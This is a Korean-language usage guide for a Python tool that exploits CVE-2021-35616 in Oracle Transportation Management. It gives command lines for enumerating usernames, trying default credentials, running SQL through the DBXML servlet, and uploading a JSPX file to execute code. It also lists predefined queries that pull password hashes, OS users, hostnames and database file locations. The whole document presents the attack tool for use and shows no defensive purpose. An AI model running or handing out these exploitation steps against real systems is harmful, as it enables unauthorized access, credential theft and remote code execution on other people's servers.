
CVE-2021-35616 악용을 위한 Python 도구
CVE-2021-35616 악용을 위한 Python 도구
이 스크립트는 모듈로 작동하며, 다음 순서로 구현했습니다.
► 사용자 이름 열거
► 기본 자격 증명 검색
► DBXML 서블릿을 사용한 SQL 쿼리 실행
► 전체 악용 및 JSP 실행
스크립트 구문은 다음과 같습니다.
.\OracleOTM.py {module} {host TXT file} {additional parameters}
사용자 이름 열거: .\OracleOTM.py enum {hosts TXT file} -u users.txt
기본 자격 증명 검색: .\OracleOTM.py default {hosts TXT file}
DBXML 서블릿을 사용한 SQL 쿼리 실행: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
또한 제가 유용하다고 생각한 사전 정의된 쿼리 몇 가지를 준비했습니다. 다음과 같이 직접 접근할 수 있습니다.
.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os
OS – 서버의 OS 추출
Osuser – DB를 실행 중인 OS 사용자 추출
Hostname – DB 서버 호스트 이름
Hostip – DB 서버 IP 주소
Passwords – OTM 사용자와 해시된 비밀번호 추출
Oraversion – DB 버전
Dbusershash – DB 사용자 비밀번호 해시
Dbfileslocation – OS에서 DB 파일의 위치
전체 악용 및 JSP 실행: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"